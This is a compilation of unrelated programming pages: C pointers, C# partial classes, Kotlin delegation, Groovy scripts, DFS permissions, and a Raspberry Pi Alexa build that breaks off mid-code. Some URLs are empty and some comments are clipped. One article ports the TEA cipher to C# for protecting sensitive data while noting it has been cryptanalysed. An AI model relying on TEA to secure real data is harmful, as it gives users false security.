> statement does. dir() shows you what's in the namespace; therefore it
> lists x. dir() doesn't care, and can't know, if something was defined
> in a namespace, or merely imported.
>
> If it bothers you, you can put "del x" after the class y definition,
> but I recommend against doing that in general. If there's a reference
> to x inside a function, that function will raise an exception if
> called, because it expects x to be inside the namespace.
>
> Carl Banks

So it must never make sense to put subclasses in separate modules?
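The behavior discussed in the thread can be reproduced without creating separate files, by building the two modules in memory. This is a self-contained sketch; the module names mirror the thread's x.py/y.py, and assigning y_mod.x by hand plays the role of the "from x import x" binding:

```python
import types

# Simulate x.py: a module whose namespace defines class x.
x_mod = types.ModuleType("x")
exec("class x(object):\n    pass", x_mod.__dict__)

# Simulate y.py: "from x import x" binds the name x in y's own
# namespace, then class y is defined against that binding.
y_mod = types.ModuleType("y")
y_mod.x = x_mod.x
exec("class y(x):\n    pass", y_mod.__dict__)

# Both names live in y's namespace, which is why dir() lists both.
print(sorted(n for n in dir(y_mod) if not n.startswith("__")))
```

As Carl Banks says, dir() simply reports the namespace contents; it cannot distinguish a class defined in the module from one imported into it.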
https://mail.python.org/pipermail/python-list/2010-October/590308.html
Hi guys,

I've built a lab to play with DFS, replication, and permissions. I've created a namespace called Data so I can access it with \\server\data. Now I've created a folder Sales in the Data folder. I see I can only manage the NTFS permissions using the Windows folder permissions and not through DFS. Is it even possible to manage all permissions on the folder using DFS Management, or do I have to create a DFS namespace for each department?

Thank you guys

2 Replies

Nov 17, 2016 at 2:30 UTC
DFS is all about providing a central point for users to access data. It's not about permissions for that data, as this is still taken care of at the file system level.

Nov 17, 2016 at 4:27 UTC
Thank you, I just found some interesting videos online. I completely understand DFS now, big thank you guys.
https://community.spiceworks.com/topic/1926221-dfs-ntfs-permissions
In this tutorial about pointers in C/C++ programs, we will learn how to use pointers as function arguments, also known as function call by reference, in C/C++. This is one of the main use cases for pointer variables.

Pointers as Function Arguments

Before diving straight into the topic, let us first look at an example C program involving a user-defined function. The aim of this program is to decrement the integer variable 'x' using the user-defined function void decrement().

#include <stdio.h>

void decrement(int x) {
    x = x - 1;
}

int main(){
    int x;
    x=100;
    decrement(x);
    printf("x = %d", x);
}

How the Code Works?

As you can see, the integer variable 'x' is declared and initialized to 100 in the main() method. The purpose is to decrement the value of the variable 'x' by one. Instead of writing x = x - 1 in main(), the decrement() function is used.

int main(){
    int x;
    x=100;
    decrement(x);
    printf("x = %d", x);
}

decrement() is a user-defined function that takes the integer variable 'x' as an argument and decrements its value by 1.

void decrement(int x) {
    x = x - 1;
}

This function is called inside main() with 'x' as the argument. Then, the value of 'x' is printed as output.

printf("x = %d", x);

The person who wrote this sketch expects that the value of 'x' will be decremented by 1 and will thus be (100 - 1) 99. Let us see if this is the case or not.

Code Output

After the compilation of the above code, you will get this output. As you can see, the value of x is still 100, which is the value it was initialized with. It did not decrement. Let us see why this happened and how to resolve it.

Problem with the Code

The issue with the above program code is that the integer variable 'x' is not being accessed properly. Whenever we declare a variable inside a function it is called a local variable. By using the variable name we can access that variable only in the same function in which we have declared it.
Thus, the variable 'x' in the function decrement() and the variable 'x' in main() are not the same variable! When main() calls the decrement() method and passes 'x' as an argument to the function, only the value of x is copied into another x, which is a separate variable local to the decrement() function.

Let us modify this code to show what is happening by adding two print statements. One print statement is added in the decrement() function to print the address of its variable 'x'. Likewise, another print statement is added in main() to print the address of the variable 'x' present in main(). Remember, to access the address of a variable, we add '&' in front of the variable. (Strictly speaking, addresses should be printed with the %p format specifier and a cast to void*, rather than %d.)

#include <stdio.h>

void decrement(int x) {
    x = x - 1;
    printf("Address of 'x' in decrement() = %p\n", (void*)&x);
}

int main(){
    int x;
    x=100;
    decrement(x);
    printf("Address of 'x' in main() = %p\n", (void*)&x);
    //printf("x = %d", x);
}

Code Output

After the compilation of the above code, you will get this output. Notice that the addresses are different for the variable 'x' in decrement() and in main(), showing that these are indeed two variables and not the same one. If the variable 'x' in decrement() and main() were the same, the addresses would have been the same as well.

Application Memory

To understand this better, let us see what happens in a computer's memory when a program executes. When an application is started, the computer sets aside some amount of memory for the execution of the program. This memory is divided into four categories as shown in the diagram below.

One part of memory is allocated to store the various instructions in the program (code). The computer needs to keep all its instructions in memory, e.g. sequential instructions. Another part of the allocated memory is for global variables. If we do not declare a variable inside a function in C/C++, then it is known as a global variable.
Global variables can be accessed and modified anywhere in the program, unlike local variables, which can be accessed and modified only within a particular function or code block. The third part of the memory is called the stack. This is a very important segment for this guide: it is where all the local variables are stored. The fourth part is the heap, which we will discuss in later guides.

Of these four sections of the allocated memory, the code segment, the global variables and the stack are fixed in size. They are decided when a program starts executing. The application can, however, ask for more heap memory during execution.

RAM

Let us look at the computer's RAM when a program executes. Each byte in the memory is addressable. Let's say the memory allocated for our program runs from address 200 to 900, holding the various segments of our application's memory, and that addresses 400-700 are allocated for the STACK, as shown below. For example purposes, we will use the program code that we specified in the first section.

#include <stdio.h>

void decrement(int x) {
    x = x - 1;
}

int main(){
    int x;
    x=100;
    decrement(x);
    printf("x = %d", x);
}

When the program starts, the main() method is invoked first. All the information about the method call, for example parameters, local variables, the calling function to which it should return, and the current instruction at which it is executing, is stored on the STACK.

Stack Frame

We take some space from the stack for the main() method and create a unit called a stack frame. Each function will have a stack frame associated with it. Inside this stack frame we have our variable 'x'. Memory is allocated for x from this stack frame and its value is set to 100.

Calling decrement() in main()

Additionally, the main() method also calls the decrement() function. What happens then? The machine pauses the execution of main() for some time.
It goes ahead and finishes the decrement() method first, and then resumes the main() method. Thus, another stack frame is allocated, this time for the decrement() function, with the parameters of the decrement() function like 'x'. New local variables are created corresponding to these parameters, and whatever values have been passed are copied into these variables.

Now, inside the decrement() function, the statement x = x - 1 is executed. This 'x', which is local to this particular decrement() call, in this particular stack frame, is decremented by 1 as shown below. Note that we cannot access this variable outside its stack frame.

When decrement() finishes, control returns to the main() method. The machine clears the stack frame that was allocated for decrement(), and the main() method, which was paused, resumes. Thus, the lifetime of a local variable lasts only as long as its function is executing.

The next statement in the main() function is printf(). The state of execution of the main method is paused and printf executes. This structure is known as the function call stack: whichever function is at the top of this stack executes. Remember, the stack is fixed in size, so if you have a scenario where one function keeps calling another function indefinitely, the memory of the stack will overflow and the program will crash.

Call by Value

Let us look at our decrement() function. Here 'x' is in the stack frame of the main() method.

void decrement(int x) {
    x = x - 1;
}

main() is our calling function and decrement() is our called function. The argument we pass in the calling function is known as the 'actual argument'. In the called function, the parameter is known as the 'formal argument'. All that happens is that the actual argument is mapped to the formal argument.
So when this function call happens, 'x' as an actual argument is mapped to another 'x', which is a formal argument. If instead of 'x' we had a 'y' here, then we would have written the decrement function as shown below:

void decrement(int y) {
    y = y - 1;
}

In this case 'x' would have been mapped to 'y', so the value of 'x' would be copied to the variable 'y'. When we make such a function call, where one variable is mapped to another variable and the value of one variable is copied into the other, the call is known as CALL BY VALUE. This is what was happening in the initial sketch: a call by value was being made, which is why the desired result was not obtained. Now, how do we get the desired result? Let us look into that.

Call by Reference

We want to use the variable 'x' local to the main() method inside the decrement() function. This can be done if we use pointers as function arguments. We have modified the initial code below to give the desired outcome. Let us look into it.

#include <stdio.h>

void decrement(int *ptr) {
    *ptr = *ptr - 1;
}

int main(){
    int x;
    x=100;
    decrement(&x);
    printf("x = %d", x);
}

Notice that the decrement() function's argument is not an integer variable anymore; in fact, the argument is a pointer to an integer. As you already know, a pointer to an integer is used to store the address of an integer. In the decrement() function call, we are passing the address of 'x' as &x.

When the program executes, the main() method will be invoked first. For example, let us say that the stack shown below corresponds to this program sketch. The stack frame of the main() method spans addresses 400-500. There is a local variable 'x' in this main() method; the address at which 'x' is stored is 450 and the value stored in it is 100. When the main() method calls decrement(), a local variable corresponding to the parameter 'ptr' is created. This is a pointer to an integer, and the value passed to this variable will be 450 (the address of x).
Thus, ptr is pointing to x. Now when we say *ptr we are dereferencing this address. The following statement in the decrement() function:

*ptr = *ptr - 1;

means that the value stored at the address held in ptr is decremented by 1. Hence (100 - 1 = 99), 'x' is now 99. When decrement() finishes, we come back to the main() method and the print statement gets executed. As x is now 99, this is the output that will be printed. After the compilation of the above code, you will get this output.

Points to Note

A function call in which, instead of passing the value of a variable, we pass the address of the variable, so that we have a reference to the variable and can dereference it and perform operations on it, is called call by reference. So if we use pointers as function arguments then we are using call by reference. Call by reference can save us a lot of memory, because instead of creating a copy of a large and complex data type we just use a reference to it. Using a reference will make our program code efficient and lead to less memory consumption.

You may also like to read:
- Function Pointers in C/C++ and Function Callbacks
- C Program to change Endianness of data and bytes swapping example using Pointers
- How to find an array size without using sizeof() and through Pointers Subtraction
- Pointer Arithmetic, Pointer Size, and Pointer Type in C and C++
- C program to Reverse an Integer Number/ Program for Reverse Number in C
- How to find the Size of structure without sizeof() Operator?
- Dynamic Memory Allocation through Double Pointer and Function without returning address
- Returning multiple values from a function
https://csgeekshub.com/c-programming/pointers-as-function-arguments-or-call-by-reference/
Participated in the Arduino Contest 2017

24 Discussions

Question 1 year ago
Hi, I've built this all, but even when I run the code and check it in the serial monitor it says: "Connected to WiFi". But I cannot discover the device in the Alexa app. Can anyone help?

Answer 3 months ago
I got the same problem and I found that first we have to enable the Wemo skill in the Alexa app, but in my Alexa app it's not showing. You can try this if it's there. If you find another way, please let me know.

Reply 1 year ago
As I noted, all I had to do was say "Alexa discover devices" and "keyboard" was found - not sure what may be up with your implementation. Keep at it and I am sure you will get it! dave

Question 10 months ago on Introduction
This is not a question, but to let you know that one of those blinking LEDs with a built-in blink circuit and resistor for 5 V works great for keeping a computer alive. Put it in a box with the LED barely sticking out and set a mouse on top of it, centered with the mouse's LED. The mouse cursor will start moving over to the side and stay there, and the computer will not go to the screen saver or fall asleep.

Answer 10 months ago
I didn't know that would work but it makes sense - I could have set the laptop to never blank the screen, too, but wanted it to sleep when I wasn't in my office. Thanks for the info. dave

1 year ago
To those that can't discover their device with Alexa: As I mentioned in reply to a comment below. You'll need to add in your API key, WiFi SSID and password, and device ID.

1 year ago
Does anyone try with an Alexa Echo Dot 3rd generation? Alexa does not find the device.

Reply 1 year ago
It seems.

Reply 1 year ago
I cannot thank you enough for this code. Thumbs up all around!

Question 2 years ago on Step 8
How do you download all the missing libraries? I really don't know what I'm doing; here's the error message.
Plz help: Arduino: 1.8.5 (Windows 10), Board: "LOLIN(WEMOS) D1 R2 & mini, 80 MHz, Flash, 4M (1M SPIFFS), v2 Lower Memory, Disabled, None, Only Sketch, 921600" Build options changed, rebuilding all C:\Users\Bhanger Bhanger\AppData\Local\Temp\Rar$DIa0.713\Wemos-Servo-keyboard\Wemos-Servo-keyboard.ino:22:20: fatal error: switch.h: No such file or directory #include "switch.h" ^ compilation terminated. Multiple libraries were found for "Servo.h" Used: C:\Users\Bhanger Bhanger\AppData\Local\Arduino15\packages\esp8266\hardware\esp8266\2.4.2\libraries\Servo Not used: C:\Program Files (x86)\Arduino\libraries\Servo exit status 1 Error compiling for board LOLIN(WEMOS) D1 R2 & mini. This report would have more information with "Show verbose output during compilation" option enabled in File -> Preferences. Reply 2 years ago This Instructable... should help with the libraries - if you have never installed libraries with the Arduino see: Hope that helps dave 2 years ago Thanks for your help-- I was able to take your instructable and morph it to do what I needed. I was very excited to discover this :) Reply 2 years ago That is great news - thanks for letting me know dave 2 years ago. Reply 2 years ago 2 years ago I thought of another thing I want to do with this. Here is an older post of mine that after looking at this project, I hope I can upgrade my project ...... 2 years ago Why did you use GPIO14 for the servo? I'm starting on this exact circuit for another project and was going to try GPIO2 so it's closer to power. Reply 2 years ago No particular reason - the sketch should work on any of the other GPIO pins dave Reply 2 years ago? Reply 2 years ago I got it working. I updated the code from the original author.
https://www.instructables.com/Alexa-Controlled-Servo/
I would like to mark whole directories/namespaces as deprecated. Because of our SaaS applications we have multiple versions which need to stay online until nobody needs them anymore. Our namespaces/directories look like:

- module\v100
- module\v102
- module\v201

etc.

Inside an 'older' directory all files have to be marked as deprecated, so we put a `@deprecated` tag (with timestamp and info) in the doc-block of the classes, traits, etc. I have a regexp (from our NetBeans time) for replace-in-directories to automate this a bit:

([\r\n]\h*\*)(\/[\r\n]+(\h*(abstract|static))?\h*(class|trait|interface))

replace with:

$1 \@deprecated since 20210722 version v3$1$2

But I hope there is a nicer and quicker way.

nb. We are not on PHP 8 yet :-(, so attributes are no option yet.

Thanks in advance! flexJoly

I am afraid there is no option to do that automagically. However, you may want to use SSR (Structural Search and Replace), for example, to search for classes. Just in case, a little bit more about it:

I did look at that, but can't get it to work.

Search: filter for $doc$: replace with:

The search goes well. But replace gives: :-( And this is only for a class... but it should also find interfaces, traits, etc. I read the documentation over and over again. Also tried for replacement: with script:

Please help, thanks!

Tried to play around with SSR but with no luck either :( (got to try it again later). Back to the original post, what seems to be the drawback of the NetBeans-time regex replacement solution?

Thanks for trying!! The setback is that it is not saved like the SSR. And I hoped to find a nicer solution, or maybe that PhpStorm had a feature for this. I think I am not the only one needing something like this.
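If the IDE's search-and-replace feels too manual, the same NetBeans-era regex can be driven from a small script. The sketch below is my own illustration in Python: the file layout, the tag text, and the translation of PCRE's \h to [ \t] are assumptions, so adapt it before running on a real tree.

```python
import re
from pathlib import Path

# Matches the end of a docblock that immediately precedes a class-like
# declaration, a lightly adapted version of the regex from the post.
PATTERN = re.compile(
    r"([\r\n][ \t]*\*)(/[\r\n]+(?:[ \t]*(?:abstract|static))?[ \t]*"
    r"(?:class|trait|interface))"
)
TAG = r"\1 @deprecated since 20210722 version v3\1\2"

def deprecate_sources(root):
    # Rewrite every .php file under the given (hypothetical) version directory.
    for path in Path(root).rglob("*.php"):
        src = path.read_text()
        path.write_text(PATTERN.sub(TAG, src))

# A quick demonstration on an in-memory docblock:
sample = "/**\n * Old widget.\n */\nclass Widget {}\n"
out = PATTERN.sub(TAG, sample)
print(out)
```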
https://intellij-support.jetbrains.com/hc/en-us/community/posts/4404145340050-How-to-add-deprecated-to-multiple-classes-files?page=1#community_comment_4404140699666
Learning Kotlin: By [Snippet]

Want to learn more about the by keyword in Kotlin? Check out this code snippet on using the by keyword to delegate the getter/setter into separate classes.

The fourth set of Koans looks at properties, while the first two look at getters and setters. If you are coming from another programming language, then these should work the way you expect. In the delegate below, the getter ignores whatever was assigned, so the result we get is always HAHAHA. We could store the result in the instance and return the value assigned, but we do not have to. The key takeaway is that we have the logic for our properties in one reusable place, rather than scattered across multiple getters and setters.

import kotlin.reflect.KProperty

class User {
    var name : String by Delegate()
    var eyeColour : String by Delegate()
}

class Delegate {
    operator fun getValue(thisRef: Any?, property: KProperty<*>): String {
        println("$thisRef, thank you for delegating '${property.name}' to me!")
        return "HAHAHA"
    }

    operator fun setValue(thisRef: Any?, property: KProperty<*>, value: String) {
        println("$value has been assigned to '${property.name}' in $thisRef.")
    }
}

fun main(args: Array<String>) {
    val user = User()
    user.name = "Robert"
    user.eyeColour = "Green"
    println("My word ${user.name} but your eyes are ${user.eyeColour}")
}

Published at DZone with permission of Robert Maclean, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/learning-kotlin-by-snippet
In this article we are going to discuss one beautiful feature of C#: the partial class. Using the partial class concept we can split a single class into various small sections, and each section (definition) shares the same name. If you closely observe any web page, you will find that by default the main class is qualified as a partial class, like below.

Let's see how to define a partial class of our own. We have to use the partial keyword in front of the class definition.

using System;

namespace Test1
{
    partial class A
    {
        public void Partial_A()
        {
            Console.WriteLine("I am partial A");
        }
    }

    partial class A
    {
        public void Partial_B()
        {
            Console.WriteLine("I am other part of A");
        }
    }

    class Program
    {
        static void Main(string[] args)
        {
            A a = new A();
            a.Partial_A();
            Console.ReadLine();
        }
    }
}

In this example we have defined class "A" as a partial class, so we are allowed to define class "A" more than once. Behind the scenes (in the IL code), the .NET compiler combines both definitions into a single class. Below is the screen of the IL code, followed by the output screen of this code.

Do all the parts have to live in the same file? No, we can define the parts of a partial class anywhere in the project/application. It is not necessary to define them in the same file. In the example below we will implement a partial class across different .CS files, but the parts must be in the same namespace, like below.

using System;

namespace Test1
{
    partial class A
    {
        public void Partial_A()
        {
            Console.WriteLine("First Part");
        }
    }

    partial class A
    {
        public void Partial_B()
        {
            Console.WriteLine("Second Part");
        }
    }

    class Program
    {
        static void Main(string[] args)
        {
            A a = new A();
            a.Partial_A();
            a.Partial_B();
            a.Partial_C();
            Console.ReadLine();
        }
    }
}

using System;

namespace Test1
{
    partial class A
    {
        public void Partial_C()
        {
            Console.WriteLine("Third Part");
        }
    }
}

Here is the output screen. This is the example of partial classes in C#.
Hope you have understood the concept and enjoyed the article.
http://www.dotnetfunda.com/articles/show/2500/implement-partial-class-in-csharp
The Compact Framework omits the main encryption features in the Cryptography namespace to make room for more important features. Fortunately, it is not terribly difficult to implement some sort of cryptography to hide your sensitive data. I wanted to find a small algorithm that was secure and portable. After doing a little searching, I ran across the Tiny Encryption Algorithm (TEA). This algorithm was developed in 1994 by David Wheeler and Roger Needham of Cambridge University. This algorithm is extremely portable, and fast. There has been a successful cryptanalysis performed on the original TEA algorithm, which caused the original authors to modify it. The revised algorithm is called XTEA. There is not much information on this algorithm, so there is no guarantee that the XTEA algorithm has not been broken as well. However, this algorithm could still be useful for applications that do not require the highest of security. The original algorithm was developed in C, but constructed in such a way that it is easy to port to other languages, like C#. I was able to port the original C algorithm to C# with minimal changes. I tested the algorithm on the full .NET Framework as well as the .NET Compact Framework and it works great on both platforms with no changes. For more information on how TEA encryption works, refer to the links at the bottom of this article. The Tiny Encryption Algorithm works on the principle of paired blocks of data. This makes it a little more challenging to prepare strings for encryption, because you need to pass pairs of unsigned integers to the algorithm and then store them in some manner so the data can be recovered at a later point in time. I use some bit shifting to convert between integers and strings, so a little knowledge of number systems will help you out. Porting the code to C# was the easy part.
After porting the C algorithm to C#, I ended up with the following function for encryption:

private void code(uint[] v, uint[] k)
{
    uint y = v[0];
    uint z = v[1];
    uint sum = 0;
    uint delta = 0x9e3779b9;
    uint n = 32;

    while (n-- > 0)
    {
        y += (z << 4 ^ z >> 5) + z ^ sum + k[sum & 3];
        sum += delta;
        z += (y << 4 ^ y >> 5) + y ^ sum + k[sum >> 11 & 3];
    }

    v[0] = y;
    v[1] = z;
}

Simple huh? They don't call it tiny for nothing! Here is the decrypt function:

private void decode(uint[] v, uint[] k)
{
    uint n = 32;
    uint sum;
    uint y = v[0];
    uint z = v[1];
    uint delta = 0x9e3779b9;
    sum = delta << 5;

    while (n-- > 0)
    {
        z -= (y << 4 ^ y >> 5) + y ^ sum + k[sum >> 11 & 3];
        sum -= delta;
        y -= (z << 4 ^ z >> 5) + z ^ sum + k[sum & 3];
    }

    v[0] = y;
    v[1] = z;
}

Note: I only modified what was necessary to get the code to compile. I also formatted the code to make it a little more readable. In the original algorithm, they used an unsigned long for the variables; on the platforms the algorithm targeted, that is a 32-bit unsigned integer. In .NET land, the equivalent is an unsigned integer (uint).

Now we have reached the challenging part. To use the algorithm with strings, we have to convert the strings into an acceptable format. Here is a basic run-through of what I did to make use of the algorithm:

My Encrypt function looks something like the following:

public string Encrypt(string Data, string Key)
{
    uint[] formattedKey = FormatKey(Key);

    if (Data.Length % 2 != 0)
        Data += '\0'; // Make sure array is even in length.

    byte[] dataBytes = System.Text.ASCIIEncoding.ASCII.GetBytes(Data);
    string cipher = string.Empty;
    uint[] tempData = new uint[2];

    for (int i = 0; i < dataBytes.Length; i += 2)
    {
        tempData[0] = dataBytes[i];
        tempData[1] = dataBytes[i + 1];
        code(tempData, formattedKey);
        cipher += ConvertUIntToString(tempData[0]) + ConvertUIntToString(tempData[1]);
    }

    return cipher;
}

The Decrypt function basically is just the reverse of the Encrypt function:

public string Decrypt(string Data, string Key)
{
    uint[] formattedKey = FormatKey(Key);
    int x = 0;
    uint[] tempData = new uint[2];
    byte[] dataBytes = new byte[Data.Length / 8 * 2];

    for (int i = 0; i < Data.Length; i += 8)
    {
        tempData[0] = ConvertStringToUInt(Data.Substring(i, 4));
        tempData[1] = ConvertStringToUInt(Data.Substring(i + 4, 4));
        decode(tempData, formattedKey);
        dataBytes[x++] = (byte)tempData[0];
        dataBytes[x++] = (byte)tempData[1];
    }

    string decipheredString = System.Text.ASCIIEncoding.ASCII.GetString(dataBytes, 0, dataBytes.Length);

    // Strip the null char if it was added.
    if (decipheredString[decipheredString.Length - 1] == '\0')
        decipheredString = decipheredString.Substring(0, decipheredString.Length - 1);

    return decipheredString;
}

ConvertUIntToString packs each byte of a uint into a character of the output string:

private string ConvertUIntToString(uint Input)
{
    System.Text.StringBuilder output = new System.Text.StringBuilder();
    output.Append((char)((Input & 0xFF)));
    output.Append((char)((Input >> 8) & 0xFF));
    output.Append((char)((Input >> 16) & 0xFF));
    output.Append((char)((Input >> 24) & 0xFF));
    return output.ToString();
}

Here is the function to undo what ConvertUIntToString does:

private uint ConvertStringToUInt(string Input)
{
    uint output;
    output = ((uint)Input[0]);
    output += ((uint)Input[1] << 8);
    output += ((uint)Input[2] << 16);
    output += ((uint)Input[3] << 24);
    return output;
}

Anding the shifted Input with 0xFF will cause only 1 byte to be returned. The sample code includes a sample application for the .NET Framework and the .NET Compact Framework.
http://www.codeproject.com/Articles/6137/Tiny-Encryption-Algorithm-TEA-for-the-Compact-Fram?fid=33635&df=90&mpp=10&sort=Position&spc=Relaxed&tid=4592645
In a previous blog post we have seen how we can use the BaseScript AST transformation to set a base script class for running scripts. Since Groovy 2.3 we can apply the @BaseScript annotation to package and import statements. We can also implement a run method in our Script class in which we call an abstract method. The abstract method will actually run the script, so we can execute code before and after the script code runs by implementing logic in the run method.

In the following sample we create a Script class CustomScript. We implement the run method and add the abstract method runCode:

// File: CustomScript.groovy
package com.mrhaki.groovy.blog

abstract class CustomScript extends Script {

    def run() {
        before()
        try {
            // Run actual script code.
            final result = runCode()
            println "Script says $result"
        } finally {
            println 'Script ended'
        }
    }

    private void before() {
        println 'Script starts'
    }

    // Abstract method as placeholder for
    // the actual script code to run.
    abstract def runCode()
}

Next we create a Groovy script where we use our new CustomScript class.

// File: Sample.groovy
// Since Groovy 2.3 we can apply the
// @BaseScript annotation on package
// and import statements.
@groovy.transform.BaseScript(com.mrhaki.groovy.blog.CustomScript)
package com.mrhaki.groovy.blog

// Script code:
final String value = 'Groovy rules'
assert value.size() == 12

// Return value
value

When we run our script we see the following output (matching the println calls in CustomScript):

Script starts
Script says Groovy rules
Script ended

Code written with Groovy 2.3.
http://mrhaki.blogspot.com/2014/05/groovy-goodness-basescript-with.html
How to build your own Amazon Echo using a Raspberry Pi and ReSpeaker 2-Mics HAT.

Story

Introduction

Hardware Overview
- BUTTON: a User Button, connected to GPIO17
- MIC_L & Audio Plug

What is the purpose of this project?

In this project we will learn how to build your own AVS using a Raspberry Pi and ReSpeaker 2-Mics Pi HAT. In this project, because of the minimality and the new experience, I used the Raspberry Pi Zero W and the latest version of Raspbian Jessie.

Step 1: Connect ReSpeaker 2-Mics Pi HAT to Raspberry Pi

Mount the ReSpeaker 2-Mics Pi HAT on your Raspberry Pi; make sure that the pins are properly aligned when stacking the ReSpeaker 2-Mics Pi HAT.

Step 2: Set up the driver on Raspberry Pi

The wm8960 codec is not currently supported by current Pi kernel builds, and the upstream wm8960 driver has some bugs which the Seeedstudio team fixed, so we must build it manually. Get the seeed voice card source code:

git clone --depth=1
cd seeed-voicecard
sudo ./install.sh
reboot

Check that the sound card name matches the source code seeed-voicecard:

**** List of PLAYBACK Hardware Devices ****
card 0: seeedvoicecard [seeed-voicecard], device 0: bcm2835-i2s-wm8960-hifi wm8960-hifi-0 []
  Subdevices: 1/1
  Subdevice #0: subdevice #0

Next apply the ALSA controls setting:

sudo alsactl --file=asound.state restore

If you want to change the ALSA settings, you can use the following command to save them:

sudo alsactl --file=asound.state store

Before the test, configure sound settings and adjust the volume with alsamixer:

pi@raspberrypi:~ $ alsamixer

The Left and Right arrow keys are used to select the channel or device, and the Up and Down arrows control the volume for the currently selected device. Quit the program with ALT+Q, or by hitting the Esc key.
(More information)

For a test, you will hear what you say to the microphones (don't forget to plug in an earphone or a speaker):

arecord -f cd -Dhw:0 | aplay -Dhw:0

Step 3: Setting up AVS on a Raspberry Pi

In this section, we need to install the Amazon Alexa Voice Service on the Raspberry Pi. See the full description and installation method from here.

Step 4: Start the Alexa Voice Service

Before you run the Alexa Voice Service (according to step 7), it is necessary to change the audio output to the headphone jack. To do this, just enter the following command (More Information):

sudo amixer cset numid=3 1

Step 6: How to use the User Button (Optional)

There is an on-board User Button which, according to the Seeedstudio description, is connected to GPIO17 (or WiringPi 0). There is an easy way to use a button (instead of speaking "Alexa") to trigger the Alexa Voice Service. Open the GPIOWakeWordEngine.cpp file from the following path with a text editor (for example nano):

cd Desktop/alexa-avs-sample-app/samples/wakeWordAgent/src/
sudo nano GPIOWakeWordEngine.cpp

Then modify Line 11 as in the following code and save (GPIO_PIN 0 in the WiringPi library is the same as GPIO17):

static const int GPIO_PIN = 0;

It is then necessary to recompile:

cd Desktop/alexa-avs-sample-app/samples/
cd wakeWordAgent/src && cmake . && make -j4

In the end, to test, we use the following command (just note that before executing it, you must run the AVS web service and sample app according to step 7):

cd wakeWordAgent/src && sudo ./wakeWordAgent -e gpio

Step 7: How to use the on-board APA102 LEDs (Optional)

As described by Seeedstudio, 3 APA102 RGB LEDs are connected to the SPI interface. In this section, to control the LEDs, we will use the Pi4J project. Pi4J is intended to provide a friendly object-oriented I/O API and implementation libraries for Java programmers to access the full I/O capabilities of the Raspberry Pi platform.
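Before wiring this into Java, it may help to see the APA102 wire format on its own: a start frame of four zero bytes, then one 4-byte frame per LED consisting of 0xE0 ORed with the 5-bit brightness, followed by the blue, green and red bytes, the same layout the write_led method transmits. Here is a small Python sketch of mine (the function name is invented) that builds such a byte stream:

```python
def apa102_frame(pixels):
    """Build the byte stream for a chain of APA102 LEDs.

    pixels: list of (r, g, b, brightness) tuples with 0-255 colours and
    0-31 brightness, mirroring the set() call in the Java code.
    """
    out = bytearray(4)  # start frame: 32 zero bits
    for r, g, b, bright in pixels:
        out.append(0xE0 | (bright & 0x1F))  # '111' marker + 5-bit brightness
        out += bytes((b, g, r))             # APA102 expects blue, green, red
    # A real driver follows this with extra clock pulses to latch the data,
    # as the latch() method does.
    return bytes(out)

# The three colours the project pushes out in recordingStarted():
frame = apa102_frame([(255, 0, 0, 31), (0, 255, 0, 31), (0, 0, 255, 31)])
print(frame.hex())  # 00000000ff0000ffff00ff00ffff0000
```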
In the first step, please enable SPI according to the following instructions:

sudo raspi-config

Go to Interfacing Options, then SPI, enable SPI, exit the config menu and reboot.

In my experience we need to use the latest Pi4J snapshot builds: version 1.1 is not compatible with the latest version of the Raspberry Pi kernel. To use snapshot builds in your Maven project, you must include the following repository definition in your pom.xml file. Open the pom.xml file from the following path with a text editor (for example, nano):

cd Desktop/alexa-avs-sample-app/samples/
sudo nano pom.xml

Now add the following lines to pom.xml:

<repositories>
  <repository>
    <id>oss-snapshots-repo</id>
    <name>Sonatype OSS Maven Repository</name>
    <url></url>
    <snapshots>
      <enabled>true</enabled>
      <updatePolicy>always</updatePolicy>
    </snapshots>
  </repository>
</repositories>

It is also necessary to add the following lines to pom.xml. This dependency is all that is needed to include the Pi4J core library in your Maven project:

<dependency>
  <groupId>com.pi4j</groupId>
  <artifactId>pi4j-core</artifactId>
  <version>1.2-SNAPSHOT</version>
</dependency>

In the next step, open the AVSController.java file from the following path with a text editor:

cd Desktop
sudo nano AVSController.java

Now add the following imports to the top of AVSController.java:

import com.pi4j.io.gpio.GpioController;
import com.pi4j.io.gpio.GpioFactory;
import com.pi4j.io.gpio.GpioPinDigitalOutput;
import com.pi4j.io.gpio.Pin;
import com.pi4j.io.gpio.RaspiPin;

Also add the following fields to the AVSController class:

private GpioPinDigitalOutput dat;
private GpioPinDigitalOutput clk;
private int[] data;
public int WIDTH;

Then add the following line (for example, after the initializeMicrophone function); the number 3 here is the number of LEDs.
initapa102(GpioFactory.getInstance(), RaspiPin.GPIO_12, RaspiPin.GPIO_14, 3);

In the next step, add the following methods to AVSController.java (for example, before the recordingStarted function):

public void initapa102(GpioController gpio, Pin data_pin, Pin clock_pin, int n) {
    WIDTH = n;
    dat = gpio.provisionDigitalOutputPin(data_pin);
    clk = gpio.provisionDigitalOutputPin(clock_pin);
    data = new int[n];
    // Set all off to start with.
    for (int i = 0; i < WIDTH; ++i)
        data[i] = 0;
    // And push that out to the devices.
    show();
}

public void set(int n, int r, int g, int b, int bright) {
    if (n < 0 || n >= WIDTH || r < 0 || r > 255 || g < 0 || g > 255
            || b < 0 || b > 255 || bright < 0 || bright > 31)
        throw new IllegalArgumentException("Invalid parameter");
    data[n] = (bright << 24) | (r << 16) | (g << 8) | b;
}

public void clear() {
    // Set all off to start with.
    for (int i = 0; i < WIDTH; ++i)
        data[i] = 0;
    // And push that out to the devices.
    show();
}

public final void show() {
    // Transmit preamble
    for (int i = 0; i < 4; ++i)
        write_byte((byte) 0);
    // Send data
    for (int i = 0; i < WIDTH; ++i)
        write_led(data[i]);
    // And latch it
    latch();
}

private void write_byte(byte out) {
    for (int i = 7; i >= 0; --i) {
        dat.setState((out & (1 << i)) != 0);
        clk.setState(true);
        clk.setState(false);
    }
}

private void write_led(int data) {
    write_byte((byte) (0xe0 | ((data >> 24) & 0x1f)));
    write_byte((byte) (data));
    write_byte((byte) (data >> 8));
    write_byte((byte) (data >> 16));
}

private void latch() {
    // Transmit zeros not ones!
    dat.setState(false);
    // And 36 of them!
    for (int i = 0; i < 36; ++i) {
        clk.setState(true);
        clk.setState(false);
    }
}

Also add the following lines to the recordingStarted function; this turns the lights on:

set(0, 255, 0, 0, 31); show();
set(1, 0, 255, 0, 31); show();
set(2, 0, 0, 255, 31); show();

Then add the following line to the recordingCompleted function; this turns the lights off:
clear();

Also add the following lines to the onAlexaSpeechStarted function; this turns the lights on during Alexa's response:

for (int x = 0; x < 3; ++x) {
